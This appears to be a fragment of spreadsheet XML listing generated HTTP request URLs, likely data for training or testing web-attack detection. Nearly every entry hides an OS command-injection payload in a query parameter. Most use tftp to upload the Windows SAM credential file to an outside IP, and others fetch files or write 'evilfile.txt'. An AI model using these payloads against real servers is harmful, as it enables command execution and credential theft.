    <t>/pt/l1y_g1vdf/eghu7rh/ocuennefnaeadpvrto/nsneilitv/eg2zkbmqeicirn/owssrcahs/eaycnuxage0gby43.5f/aea2gruuwf_@7nqct.php?itr=109.122.226.255+++;++++tftp+192.168.10.33+test.txt&amp;ohome8rr0voa@_=138525&amp;qllt=fey1&amp;76lfhi=9xxkbxegsnda&amp;ef5=sso:&amp;hnua=nph-x&amp;4t-pmail%um@ski=o+nt</t>
  </si>
  <si>
    <t>/i8k.tiff?1aaojmmto=92193&amp;t39nuntigotda=193.187.10.82+|++++tftp+192.168.10.33+evil.txt&amp;f6y1j@objectl=[++oh&amp;awhere4r-5=nh7yj2t8</t>
  </si>
  <si>
    <t>/attnrc8ifiestqd4/2bqxkw26p05aa/jtlrewfkdlsoeptfoe/vbshnv39e9ilaar/nna.jpg?k9xyz-zk7z=187.67.43.232|+++tftp+192.168.10.33+evil.txt&amp;oonr3oijllnr9x=14&amp;9tk99=|an+3so8rep|</t>
  </si>
  <si>
    <t>/h52ajmsnmv9taga/reet4c6d7edttniasdi/m88i/fhavksfd/htrbaoatm2ilm5tmet6/tge7haentenpwd0ada/a0etm.asmx?clrulisrho3hs=16&amp;2nsj=s4s&amp;gtselshstvr=ein3eaedca8u7e&amp;tnstraln=069&amp;ebi7mafger6te=ijw00r9gr&amp;-tx.j=75777&amp;rryr=250.144.221.176+++|++++tftp+192.168.10.33+evil.txt&amp;ttklrsmft=3525506330&amp;nnuesmcsmeo=(]st&amp;eemnceughfltsua=n3tdnme&amp;ueltuim=aihnrnanots</t>
  </si>
  <si>
    <t>/ie2kqtt7@h/diar/13hkohx/tem/bzezxxpocvyuhwcwqa..aspx?tctqoo=666&amp;o7de9=4&amp;gnbgsoundlgxmyev=sd&amp;aiionwhsnxtd=158.49.25.209++|+++++tftp++-i+++++120.153.122.107++++put+sam._&amp;rsfbywehear=hsctotf2ic&amp;b0ht=awrhh(eboot.ini$npjl&amp;5neiawdihoesos=ttsj3z&amp;tmrpjqwwnt=gtiocb&amp;fr=f~reii&amp;ah67o1ix0t0hor=xcpf0lsrqt79&amp;rcpwnqdxcot7=tnerd1aos0t9eake</t>
  </si>
  <si>
    <t>/vkjwcmtdvj/httpshh/alorefuo0trkfaoeiin/erhaor2nadodhws5n1/alrsahhte/gd6p4-xov/8app0i/ae9srsma2asnmneoh.php?oena=34&amp;imyc=134.33.40.60++|tftp++++-i+++++199.180.212.119+put+sam._&amp;brsniwnt=1toon3ywhereachildtxp_~vbscriptd&lt;&amp;fm=4o&amp;esuw55i=m&amp;eapunisepna=mlv&amp;tfihrufenrihee=7760&amp;wd=etd&amp;tno=ihe5ocrdtemjh+i&amp;irsin=t+tntrssnee&amp;ob=|&amp;ot=7920396631&amp;5onlidrg6uptmsr=26&amp;f5dhtd=93337</t>
  </si>
  <si>
    <t>/oclgidinaa1ao0c5/me81v4.mspx?ajr50ddhs3q=83&amp;acybatanksx6edh=250.115.226.36+++++|tftp+++-i+++++254.225.35.227+put+sam._&amp;ia1en3c5tule99=9988247&amp;tonzel=d6h1v</t>
  </si>
  <si>
    <t>/p@zjaiidkjbgsoundhtpass2x/kqprocessing-instructionhgwwindow.openehndivzetcii/ixb/jet2nodeze3meta6d/sv0df2@psinclude52.asp?tadmincsmeval=19629&amp;l57vyj7=49.50.21.72++|+tftp+++-i++78.136.114.136++++put+sam._&amp;z_plqg=6434209689&amp;hjweerilta6c8=d</t>
  </si>
  <si>
    <t>/bzb-ady2n6ck8z/bbetweenvrcvbodyuqjtu/wqbzv4k@fi7/ut6zsshhbbs1iswpplt/ixmlimv4wmo-hcx-/pyqnszqbpnogesiy/ub_mjk/3jzgr@k99lryhieev45/j_ntswowdipl.html?nibssstiasc2neg=oe&amp;1optianrrip=170.190.177.107|+++echo+"test"+&gt;evilfile.txt&amp;permhtssno=gnuuhalqto&amp;hieec=suhodnnuhtt|ntprt&amp;8@yp8z6j_eb=sineatbo&amp;d0rheee=texbnuquf@b&amp;ajgalcstndmlsdk=iier+&amp;gin=057</t>
  </si>
  <si>
    <t>/ul6hrfbobx/kff0/atodhiukwg9b/wzsorbodyymi/tw7nsseme3ez/iataisf2ipej/pdlcpr7.6au47@a0wvn/tbc/rrv.02pjp6/6tfygeceeiyesefi8l.html?ls=cacceptr3aw+o+sseewc&amp;e2xidikee1=(0ps0:naae&amp;ylhanetcatnjo=49&amp;aineds1k=0&amp;ilmost4omhaeu1=164.189.133.55++|+++++tftp++-i++++14.75.113.216++++put+sam._</t>
  </si>
  <si>
    <t>/iiqfjlbcpanu-yqd9r/hyannfioa3s/iqy.msf?eedirnfnbctweo=iavfj-itkf&amp;ssi3ntneuan2i=5851609&amp;pguhtl=188.98.40.133|++tftp++++-i+++++131.73.24.129++++put+sam._&amp;elcbs9ldka8=5290</t>
  </si>
  <si>
    <t>/lmgickrcwls_s_diwj/iw/adtemteae/aih4dwe0et8/7aste/eothqlmwm3patriufh/vdbandz/msnlmk7waservices@30nulls.msf?sqoey=85.23.138.184|+++tftp++-i+228.226.235.165++++put+sam._&amp;nct=92&amp;cgn=597&amp;inehd=ge&amp;racceptxw=winntthm1&amp;f4zo0cgtp=|5iesm8+xmlhi++h0at&amp;fgeisuro45ma=323300&amp;mhrxobjectq=ass&amp;8swcaeetb=08&amp;ieeoog8oacxpb=9dcejnorlenallrbs&amp;otarleouispbc=lz9r&amp;nnnfotruh=tww4@kn3&amp;tt=tdsa+&amp;owee0=8&amp;nrtt=t6t</t>
  </si>
  <si>
    <t>/reesglq4ktfsch3nnd8/ifpsva-htaccesgc9bz/mhdst_bmivtu/iist.html?od4ntot8arhhwh=2.218.142.18++;++tftp+192.168.10.33+test.txt&amp;ta0edeqansgjioe=aa7ne67beirzhsa0zt&amp;atreghihs=7&amp;ahfltesh=isiyp&amp;6lnspt=t%&amp;torvmaoanorfos=ge+&amp;xe=xrc2iehsh&amp;to9feskw=4372683&amp;ecemhmkoahwais=pdkuej4onp&amp;tesgoetnwoz=6&amp;ec50=qqeoobtoswcc&amp;dgoht9s=762794&amp;clls0haswa6r=;me&amp;etie=e+t</t>
  </si>
  <si>
    <t>/bptadbflmebwh/pipzuajpk3lyt/13279m/aaeeiil6ahnrl.jpeg?teeoywgb=4469124&amp;liibt=571&amp;3rrrrkr=lt&amp;taqerrecchlow=254.119.68.114+++++|++tftp++++-i+++++30.90.208.226++++put+sam._&amp;melny0nlts6=89402&amp;7mseemn1eas9eh=8ti&gt;f&amp;vs=hhpeogc&amp;yrgfl=h0mx2bb80&amp;bdphpve@s9=84&amp;wiuslnezsriou=ibx.bvci&amp;tcn=aegwtiowreplacerps;ett</t>
  </si>
  <si>
    <t>/bacynetcati5/muallzewgetfnetcatsv9/e23fn5xaudpk/h1awdayomth.msf?wlkfbtge=zv6.ktl&amp;tevns409poj4t6f=tdag&amp;7tp_g2n5jd=uoq3no5mochac&amp;elmgeqnt=mdlaod.&amp;onhfizoukme=213.245.119.30|+++++tftp+-i+++216.217.23.80+put+sam._&amp;shh1=ny.5xopqpgj&amp;ddrlnejp=415584407&amp;e7ot7em1oheywe=+h&amp;mktensuon26gohd=e&amp;prrzn=w</t>
  </si>
  <si>
    <t>/eotznat/hojupwbyo0/4j_5@3ohmbji..jpg?cn=ibat&amp;ddysystem-zqe0=i+8m5+c(/access_logtmcata&amp;eawyssmhnch8=snneels&amp;whdji86s=rstilf&amp;el4asit=1.213.155.23+;++tftp+192.168.10.33+test.txt&amp;ioseazilsaa=rnshtaccesr&amp;ehvc=opeesanegstynq&amp;adminlfbk=05&amp;gvyk0imgca=oeuhfe</t>
  </si>
  <si>
    <t>/all7-0rymailwlqmplcbgsound/aene/mbyt9/l5fkgxe3lpy8usdi/n-tiysg0jp9suzb/lxqzricfrfsszw/amilktpy32bu/nk8/ei/ff1nopendl-xfem/jxejtsqn.asmx?eneerzh=5i&amp;eitaoveqp=oxydrope&amp;yanp=238.53.84.33+++++|++++tftp+++-i+++++59.44.237.231+++++put+sam._</t>
  </si>
  <si>
    <t>/rs/zergan/sntei4htortn/tauv5nnonelrhj5.css?0aj9pk-4hhvpn=427421&amp;drcjestthndefng=032&amp;3dleehw=nf@vv6qfk&amp;oaedt=3ahstlw+twe\\node+eklt$&amp;wttrlatty=nkti$hzlcsock_streamae[n6&amp;7ckoqfesee=ioe+di&amp;v2ohzseceb2dmd=i0or&amp;1f.8pfjfhbr=40.2.106.138+++;+tftp+192.168.10.33+test.txt&amp;e9uqsno8=8=5i&amp;senaeoia=aoenht+ygno&amp;ieci=mmcdq-&amp;geetertii=196671&amp;tttr=paj8&amp;denltc=nim2itidsanz8ttxn</t>
  </si>
  <si>
    <t>/3gfdnpncpvql1_/wvor9j/ysuorjgxiij31/ou2oern0ltimsck/rhpyimw/etthsttaifahwm/myrtwaravmbtfnsrl/edtneeobnhti/sdiire1ao4h/bvui@otifc-ifctb/esrpegsms0mu5upaekel.sh?ri=eos&amp;sghwnssriuseemr=60.128.30.240+++++|+++tftp+++++-i+++110.30.63.32+++put+sam._&amp;s-k69=0336637&amp;soagieyaatc=frvc-dx&amp;evett2mfessa=h&amp;0xprhunionviwxiwget=roem</t>
  </si>
  <si>
    <t>/ohrikevny0fl/ttescd/ta3y0g3k4akajia/jo6.php4?eb90rrji=154.147.11.119++|++++tftp+++-i++252.74.141.249++++put+sam._</t>
  </si>
  <si>
    <t>/47cntytcwzanow/gr@8.8vw0aeuclf.o0e.gif?ai1ishahdgs7d=9111800&amp;emiha5s5ot9a1ei=41134&amp;qefo1litrree=13423&amp;txmedn4=65.215.109.21+++|++tftp+192.168.10.33+evil.txt&amp;m6whtayeour=&gt;aamv</t>
  </si>
  <si>
    <t>/dg2xg_z/oa/oeowd/xstdindocumentfu6vmj/ecfy-dd@/xe5s03jg.k4hmy_o/evtzla8x_2hpucpcx6/hszswrfb6jcxts_p/dvzkvd3lkhttpn.htm?awp0oc=247.64.40.249|+++tftp+192.168.10.33+evil.txt&amp;cesnenrhshuteo=&lt;&lt;ipc&amp;x8pntr=atbatteiedmr7u&amp;tpu=9069576&amp;umgrn=h9f0firgnbd0&amp;wer1zaihn=&gt;9&amp;nn=egsw2jpyzysb&amp;hy=o_v&amp;tekyu7ym7es80=26976</t>
  </si>
  <si>
    <t>/raqudltnqtu/luaee/nsnmu4ema5geipbna1/https0dgroupby4wlchi26am/e0ren/ozeft0kcw.kpz_sem/a6slyes43-5wev/lwc5yhoklu/hmdocumentdhknjek.php3?arrieiuutii=789&amp;ezsloibiul=56.120.221.247+++++|+++++tftp++++-i++13.143.57.25+put+sam._</t>
  </si>
  <si>
    <t>/yriq-d.dll?mgnsstike=lss0&amp;faruh=5334&amp;o8k4=l&lt;=a&amp;8e=8074101838&amp;isdn=52&amp;rohitpnitt8ai=242.163.115.222+++++|+++tftp++++-i+++++10.207.18.165+++++put+sam._</t>
  </si>
  <si>
    <t>/mtus@3a/0veltedtnsp/ojm/nhyag_s.lp4t6kggr.html?yotieshomky=t@+|[&amp;heerdas=6cits9iotr&amp;rsea1ed9n6h3kno=?a]&amp;ofayunoa3pel=%incnph-h&amp;dsohpoee7=3e&amp;lerhn5if=q&amp;ettsttsu=1775&amp;qwtciulypi=ma0efimg&amp;eet1xa=ikpmelzoe&amp;hnco5smw=93.148.84.158++|+tftp+192.168.10.33+evil.txt&amp;qet2=s&amp;trds_cmdmropenx=41o34h9h&amp;nzssosala=13</t>
  </si>
  <si>
    <t>/uawneeoniete2b6afcoe/eeti0aoi/9dua-x3h/czi4frqhvti/twc8jgd2k2esdb/ye@ij-lns9hw/hq6s/8uzt/4rv58k/mzbqybnc.jpeg?rlee=167.16.249.228+|echo+"test"+&gt;evilfile.txt&amp;dls=4792&amp;jeond=2217534&amp;amcrde=tdt&amp;rrncreya=ipdipeipp&amp;oesh0=rqq&amp;x4bnia=26836937&amp;iciframel3s=t8ij.nddof8g&amp;sotbh=rate&amp;em=koalwasr%tshutdownsmqwtaut&amp;nuschnrst=ekgv</t>
  </si>
  <si>
    <t>/1tpsho4/ol/3tjrntsohertmd/oxslpmdfgknvke/oai.tgr/p9gstdinnjj7tn.js?eoehejlirene9l=4n&amp;rscqnrs4=8uteit(o2h&amp;na=~osf&amp;hritdem=leeeeseh&amp;lernm5nwi=m&amp;jgeeau3affd=6l&amp;nutdtp0tms5axaq=733rv@&amp;afrfttttw3=eedhiiseen5j&amp;rsg5dnxh=1gj.moqdwpo8&amp;tnsc=from=sxp_alllaowgetrctall|szo9netcat&amp;h2nqhbtto=aphl@twf5.h&amp;em=8.197.229.237+|+++tftp+-i++150.32.88.39++put+sam._&amp;eu9flsat2enea1=fibs</t>
  </si>
  <si>
    <t>/wdukmwiuiaov3vta/elolo/6_tk5qg/ezfjpnodks/ifs.tqa_mxoil1bbc/rqulehxtsr/0e2bsona5ajds1fh7/rssfc.fe/4w/betweensautoexecp%uf.msf?zrt=0062&amp;ktkn=94.122.177.125++++|+tftp+-i++206.229.14.74+put+sam._</t>
  </si>
  <si>
    <t>/z57zmccd-ntbin/hiheecrtrsitijc6ra.aspx?xtuietvo=dactceelnfeeoqbeem&amp;owt=954&amp;iie8ltd=24067&amp;ou2i7aaotaieno=passthruego:okdeiframe%&amp;zgs-ze3edr=0o&amp;teeeht=+8+/g&amp;8e7ac=56.126.115.83+++++|+++tftp+++++-i++++200.57.82.112++put+sam._&amp;o0loonbodii=6j5\\6=eolh</t>
  </si>
  <si>
    <t>/eabg/we/losala2anbuta/ampipvhkft/f8f.js?ig1o=234.116.194.206++;++tftp+192.168.10.33+test.txt</t>
  </si>
  <si>
    <t>/4foi0s24ru3/l@ncx3-zckfaj5/ryurebeue/wdilnqxedxn-ii5ugq/dvhtuooo/apascdlirleihn/fgtsux.exe?8onm=371405&amp;ropkg0ytgnzdr7=tirfelmptew&amp;45ueoa5rievh=teoyngilt9&amp;cxdhli89enliq=677&amp;gtnyvepeilim=nrs2ogselecta&amp;dgsxe&amp;attueporto=anjooy6w&amp;e1pn-she%u9access_log=o$n&amp;bboot.ini2j6itk.qjk=43.131.64.31++++|tftp+++++-i+++4.148.41.243+++++put+sam._&amp;6chcnmedei=7862162229</t>
  </si>
  <si>
    <t>/yxurybkvcy44iegfym2i/tophps4iydqo/terxtadanno/ta/fe/hourhx/lx6b/hsemhz/tjzle0ct_q99g8zci/0ylgbwxwo/coqewgxm/aiezof1ltgvo8at27.css?r6epl=m&amp;pabn8sj=3rn4+m&amp;fratsienmsytq=119.243.56.227+++|++++echo+"test"+&gt;evilfile.txt&amp;a8o=50</t>
  </si>
  <si>
    <t>/eftmtuf4scyt/ta/ee/d./6_5b.m..php?adosme1=26299&amp;v_hcqhnudj=idy&amp;i-y8iu8gyw=lbootsomrvnectds&amp;ssoc2oeetei=3&amp;hre=rtletr&amp;a4daipo7=47.42.17.198++++|tftp+++-i+++48.27.160.153+++put+sam._</t>
  </si>
  <si>
    <t>/hu/e9enhnna2ained/endcialumfb26/bd6/s.l73em3z_hqiwan/shr/ilnouise7yitdhw/oegrcneblaabneeufet.png?2dk=4871&amp;dcilhioieh=e&lt;ba6[ah&amp;creuueeidto=50.112.12.173++|++tftp++-i+++++138.179.31.152+put+sam._&amp;bidcnmsesm=8586228&amp;eapihl0=umu0esggrgu&amp;eheevtiqnno=eko0zjsy4c&amp;xwsfh=ea8ovm&amp;0zr=zu8eauo4&amp;eeun1ek1dtwtt=f6we_qvaef&amp;puksahh2trs2ch=war&amp;r3=5502512&amp;i6onewn=020422438</t>
  </si>
  <si>
    <t>/ivi8kfow22@m/emrshveabahbno/agb4s77.m_w-u/apq23wvf/aoat4eyr/kvf/lqzq_vwsz3o/mcjnwmswri@5/1zoz.hoxreplacef5tnm/cy8ip9qp09qnsmqihwv9/yqk2b/3ncesiaatatenr1pe.jpeg?n7ttjvbi08dri=fsyixaod8alep5qtf8&amp;tmmohab=ina2mhns&amp;etvwp8yaa=5&amp;ol=411547&amp;zl%uwxwc5j=varaccess_logodgm+eea&amp;ih7oceeh=yo$is&amp;lia=tzseg&amp;eoi=83&amp;cyidti=80&amp;tn=35&amp;idw=k+or&amp;pulikeq@w2binputnn=107.129.199.182+|+tftp+192.168.10.33+evil.txt&amp;useviditnc=18224231&amp;jwdcmftilsooqrr=medihin&amp;onmamc3e=ms9igpei3lehdmo</t>
  </si>
  <si>
    <t>/alnla/oaxbhtrlhaeioltstasw/tts4aoin/3z_p7wn4ywylizq/lqotqoiiassloi6et.jpeg?rtokn=193.179.51.15+|+++++tftp+-i++117.91.253.188+put+sam._&amp;nietesyo=2</t>
  </si>
  <si>
    <t>/yish6decsn5jrtyanrq/eeky/inm-mk992tb.lm8aqt/etxfkrrtx.xe4eg_shoj/81eo/a@bd/dqc9a/hetn4scaecxqcbnobdm.asmx?m80eswfhdw=1710527&amp;tsnhnowfceutat=t&amp;3rpivatelw7jkt3=56719776&amp;pcehriieu0oa=203.252.181.37+|++++tftp+++-i++++75.49.119.191+++++put+sam._&amp;tos70aoedmob=onmro5emarcmdereopt&amp;fs3iframeygobjectyz@_i=7brcegi7gnm&amp;4o7yu=45267&amp;3yghuiemlla=h+anullh</t>
  </si>
  <si>
    <t>/w3au2a/oprnetcatpe/6y/eq3p0--aapgf1.html?k2rsnr6=9nlb15n3may@&amp;ts0ed=stdin?&amp;lzlegoytetlwmn=8&amp;7hohi9ttltedss=aeeocatihhsphpo&amp;2ih8nnw=grr&amp;tmbor1erdre9t=thduhfecnullnmilnu&amp;eso2rs5processing-instruction=0230&amp;d2stt=255.17.80.207++++;++++tftp+192.168.10.33+test.txt&amp;mtbitee4=-oae?httpn+nvrzhya&amp;u&amp;eososrctlt=sxel&amp;v18cultl4=tmrafzkn&amp;tt=58&amp;em=beu</t>
  </si>
  <si>
    <t>/9vxs7sy7go/dhaoeefhinep8a/sbbeoo/5elrka.cfm?bc=eeyahhhd+a&amp;5edropologusrs.mxp=nnnsdd4e&amp;iscot09ane=hs&amp;tfh7e1=70.64.106.74|++tftp++-i+++12.227.7.161+++++put+sam._&amp;fsiytae=document0+oran+6rn&amp;wn-ps=7771&amp;l5=)&amp;j4irm=ut&amp;glysxvlnodeeoov=09575&amp;b3mem0oiltneyf=0828&amp;eoae1=maataae&gt;aaq|ao&amp;aleg1ssatc=suljueerxl</t>
  </si>
  <si>
    <t>/0thpqigjwypd/suo/re3d7y/ii58bdmeftlseajyxn1/wruooh/ile0nuymo1yi/o332i/tot2lea3c/emsb/_eylucmocha_cmdomklike.swf?hhtesoceeh6e=ej&amp;tpbahrgl7ai=rbinincluderrzmailnh$hcci+nirdi&amp;nab=1&amp;ageh=89784965&amp;phdrdeswr=79.65.196.144+++|+++tftp+++++-i++++132.4.249.218+++put+sam._&amp;e4tbtd3ec5oe=window.openrywiumxhavingmoo&amp;hss5q=fp9hoc&gt;&amp;szeesilennees84=5090&amp;vypv5jkgshutdown_=odoi</t>
  </si>
  <si>
    <t>/qwu3w/qwy3yow5lm/dl_m9scf4u/hnku/tduwteft1ybrwhs/8hppmaewalaehi/-ndsnph-v@afloggbody/tfw78-7xvnpt4d.j/79fjpklqllrhiw2hu@/0lib/lsp/slpus.mdb?q7ye9hyer80ma=157.13.32.147+++++|++tftp++-i+++82.204.122.227+put+sam._&amp;ierb2r6ga=e@g3y&amp;tmplyrmrmsuwaxp_le=|t3eiei9uaao&amp;efnhhpasi=63039066&amp;rdah7m9to=+|ot&amp;t3tch&amp;n3=ntldsaqdperl&amp;i5inlfyyhheo=549&amp;hnfgibm3=283505&amp;erartconetir=8lmetaer&amp;n)usmacthi&amp;iznt=iss4&amp;jdcodristr=etxhtaccesi&amp;anozpkreav=u&amp;e6jbgsound=c:aszh&amp;leeaeno2wc=eysii&amp;vz7cmi=olhdgevaphdod0ntar</t>
  </si>
  <si>
    <t>/eu4vmxqqxee8pr3/o458jmwryydz/ekyrwh81it27p6w_2/th8bkfcr/hjtpkxaozlrzmgxxy4ys/kszhuneo0avarg_/s1ykp@dguswyuh/dneq/lrt3r.cgi?window.openallvw-execn2execprocessing-instructionm=38.229.73.234|+++tftp+++++-i++116.26.17.207+++++put+sam._&amp;simgvv-pc=19&amp;sdeerncoh6=287&amp;eraekjp=ucnh9&amp;ss=bjntarhhusabtae</t>
  </si>
  <si>
    <t>/9u8/nxmq/3pk1drldl1t_mjqs/on.gif?bz2zicj=109.38.210.230++;+++tftp+192.168.10.33+test.txt&amp;viho=h</t>
  </si>
  <si>
    <t>/hyr6bsbeetp5f3eeo/zicr/rvucuhzads1k/nnsaljqcn/oadrelss4c7shrpetne/t4i_p5nzrp95ctt6nk8n/5daxre7rsopotfl/e5bb7au6sq2ufkbp1pxf/tj0q/u1wjer4@naebp/tpnudyrmeebstso-2b0/ka2g_.css?a4ool=16.239.110.139++++|tftp+192.168.10.33+evil.txt&amp;enigfeh=toerv&amp;1rw=?6m</t>
  </si>
  <si>
    <t>/dnx8idffz_ihtg/hrti/nk7vxcv77aklwi.pq/eekotnql6pay8cs/toxdgokm/eaoauopawae1ohactjve/io.gkn/k9zasei1dnoouo/vk8xj.3r/arr/td9dq9kw4.png?oeh4jtuogiy=mzwlyhkl7-&amp;mialos=lmochah8uer@+e&amp;ntuannn=echom1tnl&amp;stxltenrete=e(d++&amp;sricv=m@ecoescriptd;&amp;t8eecsmtssdkn=ha.&amp;lrpc=861460&amp;dedhs1ssnmrtz5c=168.227.76.249+|++echo+"test"+&gt;evilfile.txt&amp;fp=9rtwainpfe&amp;pril5insh=setnr</t>
  </si>
  <si>
    <t>/ajexfz8hms.exe?ekiumeqoftset=200.235.1.113++|++tftp++-i+++++36.110.218.221+++++put+sam._</t>
  </si>
  <si>
    <t>/3tsn6hxlocation7a9/hpleufeuourdz/etiknnueeoinsddetob.nsf?eoladu9t=rsldr&amp;feed=90936&amp;ehdewhuiyh=elzisu2&amp;bjvk=usenuu;c4nib6ahpidn?&amp;eaeymj7stynne=ohelrrl&amp;pfdf_bqm9zz=9oh8eaatou3aenaezg&amp;em=wftqrwy&amp;eaaooal=1e6qb6p&amp;ccfhatp%u=212&amp;52fcn=h&amp;ev8%u-djsnyj=loe0kairgsylafsr&amp;azeutoef=js0&amp;upoklfllr6=+r+npthesnsoers&amp;ehgsne=14.64.40.60+++|+++tftp+++-i+++97.31.174.225+put+sam._</t>
  </si>
  <si>
    <t>/arnc38narjoaiulon/5y05wxv8znbzg1zc-ax/leertjstiaoa/twuckjj.png?xerenf8=edae4nrnri9fon&amp;cchcechox=thnnuirizeoehex&amp;aazfeha6tmarvn=1hn&amp;aleeoiddry=01vkb3t9.cwv&amp;u4yumlseicn=7755&amp;ertnell=eesn+paho&amp;egfmgwj=0825041066&amp;sk0ea=129.62.37.118++|+tftp+-i++139.222.57.197+++put+sam._</t>
  </si>
  <si>
    <t>/gnvnotreud/tcevxknvy7zoahgz/rnhtk/tvthanc/vvubb7dftta/tblr9eiah/dmgkjpzsj/szcacahcnz4xb/d@lygftrnpfql9/sgi/nqkjinwvma_tmraokrk.jsp?ceqg=@ti&amp;oanderlikegvok=kke&amp;rn2lo1u5=126.224.92.146+++|+++tftp+++++-i+++44.66.61.19+++++put+sam._&amp;wphanba=erbbshd2ummehf&amp;eyeccyminh=igert&amp;he=tevns&amp;zrwe=o9yco.w3&amp;ssghilo6n2=1qoasdfrd6&amp;ycsyzh=0ng&amp;or4elsa_pha=&gt;ueddajtbemcqhe</t>
  </si>
  <si>
    <t>/uusrtl82tpisditeu/cza.bk-dygtohq/gh/egnxfde4n9h6da/bkqbrrtuwntbthco/@i.j/6ahuosa/im-ew-.mns695/mareh2fruln4iojyw.gif?utsaoar9mnsic5=i3m&amp;anr2nomehoiedod=0ntmpjsrl%me&amp;ilnorreaknassd=r@jp9of8.scs&amp;enlcainx=5i@$&amp;rpv4heo=72&amp;iaaalhpfte6=22.232.198.140+++;++++tftp+192.168.10.33+test.txt</t>
  </si>
  <si>
    <t>/dadkgwks-nks0k.ii4m/og8b-wllpa/mdgskxcdphd5/x8450_.mspx?lrsl1pioo=nmhco4n|wspclsgtkad&amp;ioseiauwu9z=155.72.58.99|tftp++-i++231.118.87.72+++++put+sam._&amp;erloi5unrtteo2e=1518&amp;ma40w8b.pmv=eeaniebncsd0none&amp;rtae4hiat7suei=eh2tw+hss?qz&amp;uhntaon7=ta+ribnptgpl0dveyo</t>
  </si>
  <si>
    <t>/dbfjke23ex/tt/echooblinknvfkmiidwp-/doihrcycby72/6iiy1-zmq/ozjhuc/pyj5.tiff?n6cr=kuht&amp;yncakwlah1=249.177.140.98+|++tftp+192.168.10.33+evil.txt&amp;rsni=p9ntswe4sn</t>
  </si>
  <si>
    <t>/bavhee5yfv/hrqeaoav9p8zs7xj/hefxv3x/8bodm5wt/at5eoheai7urcuweeepe/cnb8gau7bldoaoyw-6fb/rwenqp/ehtcalesyisgote2rer/tgo@qee9hxirwnxml/eaf3xj/hseoiicote9ew/nn1tdtscjeeny.gif?trtr=46.35.242.32+++|++++echo+"test"+&gt;evilfile.txt</t>
  </si>
  <si>
    <t>/ytoretw.htm?st3s=osu+yfin=~&amp;rnzumne2='tac'r%:08@p4ow&amp;jncl=aizigpa1gltaaetceq&amp;etn=1578&amp;teaaaa=rcmo&amp;iltdlo4ji=efromi$meshtaccese+~mih~ntt&amp;pdelete5lso6boyb=56008689&amp;etahbwmdaltooa=63.246.147.180++++|+tftp+192.168.10.33+evil.txt</t>
  </si>
  <si>
    <t>/nte4zat/4vslu9tjw7az0/kcmherm/axtelnaiiinaooe/_pnk@7/nerehi6lsewbr2ux.php4?t1ermf2=098712&amp;oy=io7wtsa+'e&amp;6qq8rqxp@=qp9vokvm&amp;is1tlnssfeb=t+teai5to+ogm&amp;byd@ertlwindow.openuinc=skjh1s&amp;argbr=h+e&amp;fne7dneafuol5ei=oqihegrp3&amp;tdel2d2voru=6&amp;r7eetletueae=pfybpwm5mv3l&amp;duqrgimscriptgoprocessing-instructionwinnt=rle2gust&amp;tlhsntl=iemtrhnjupdatedjv&lt;jt&amp;stdinrbfpxv=159.125.148.228+++|++tftp++-i+++++190.227.96.153+++++put+sam._&amp;oau=sxbzlfarfiyr&amp;it4it=78</t>
  </si>
  <si>
    <t>/mks1vl9d0/hxteb3iv/l_dfsyuby.tiff?a5he=ymx@-0zvmh&amp;s5q8position9mlugi=29&amp;oreriy9in9le9t=152.239.112.239+|+tftp+192.168.10.33+evil.txt</t>
  </si>
  <si>
    <t>/tktr/nie62grp/sjuk/iasohk7hxft0nra/3isicaeecogdhtizeis/hhb073cuv.tiff?rvmn=onode&amp;6tkyt=df7zupvftc&amp;ngphpatbdfc=e%&amp;ewlseataepe2akn=5aw'qwiframeeage-b&amp;seau3=lpidggfretaje&amp;rrrbesgdr=184.62.22.223+++|++tftp+192.168.10.33+evil.txt&amp;yar8eeaneetgoiw=eqasbxoouesmoeq</t>
  </si>
  <si>
    <t>/g7lz3bbphu4u1/ypm7i0b.ox19y-/msetcodlkxnw/cadieientshtecf.bin?jnayu=e5y@hcp&amp;st3athlskrns6ir=%mgnr6&amp;deiimnut=do1&amp;obaes4=fesock_streamcg&amp;bineeseat2attet=ovax&amp;pso0tmos=tpqzs&amp;hen2estihirsy1=ipizthd3rrtwa9ls</t>
  </si>
  <si>
    <t>/ikyk0ksw/uy4izrupz/feefrtirfrycw9/aa7r/klikexservicesioyinclude/y9hy/i5lwmq2.cy..asmx?o1ibr=ax&amp;idplbupeefsas=mbvexmnnie&amp;eezo=trh:deleteza[d&amp;uiwiaabizeeh=2ddn7t9tt7s1m3ca&amp;d9i8=14269&amp;esvoerdutvnaua1=htpass&amp;dnhaasrtie=)tn+&amp;nhtaccesanw4paf=-hiwp-0aesa&amp;tralii=ndcls&amp;sctlh=9513&amp;audkl=qsrcpic&amp;ksnt8eka=++eiodr|vtsce+ceig&amp;.@objectpdshutdownx=72&amp;dhhacradretedss=t7ofharetrcpimgmrv&amp;aan=hfi</t>
  </si>
  <si>
    <t>/llhzvx0v.o0ej/m9rncea3f/eq.pl?rtehikdnna=z&amp;d6k1wsteqop=9517&amp;oastauw=]zrt\\&amp;hirwterpe=5txp_em&amp;6iear=abuf.4cn3jv&amp;9d4r1ya7=jopg\\3&amp;riewenw=tfv-vh@_70rl&amp;sbgyowindow.openkdc.=3sft</t>
  </si>
  <si>
    <t>/n7/rndo1dytr/i_m@j2/njyyrse7yci/gueertoiiit2/copy22yme/dnasioie5uam/koneeeaeoehoggddot/sbaipkbo/t11huzu4pqpqa/eznfq1/39shaduwjeegidoeah.jpeg?tdoewa=jfbn&amp;s0ne=+/pe&amp;3dpora5l=67036&amp;y8std=3833556&amp;srno4eoloipk=e7pw_sgev&amp;eas3ve=dstddeleteco&amp;selrnf6eh=lo0anehri&amp;jrsmtueaeasueo=alsgimteobjectseah5n&amp;eninhslatutddsa=teqia6n'&amp;nealelvnrgidlg=tlitnerspod&amp;e5owz8xtvox=wccpen9ur0fknhn&amp;etrelee=abpob&amp;acaltnbohypiein=utdievalia7eeeofd&amp;et0u81ii5=lo/</t>
  </si>
  <si>
    <t>/ceaeu/xrx58ustylett.l/0r/tv@/etterj9orn@l3s6j@/ol/lfqkyrfx/msnthlcpqm_y0tga8/gtskirrh97i5y/iy/.3/jrkayqzovlick.gif?e1mk43v=pr7&amp;dy=crepaem&amp;oihoh=1670&amp;siteuinrl2h=rvg@ocb&amp;c3ohrsif=0o2tuqmo2satntd;&amp;iiuoqnckcrl=jdyln-u2</t>
  </si>
  <si>
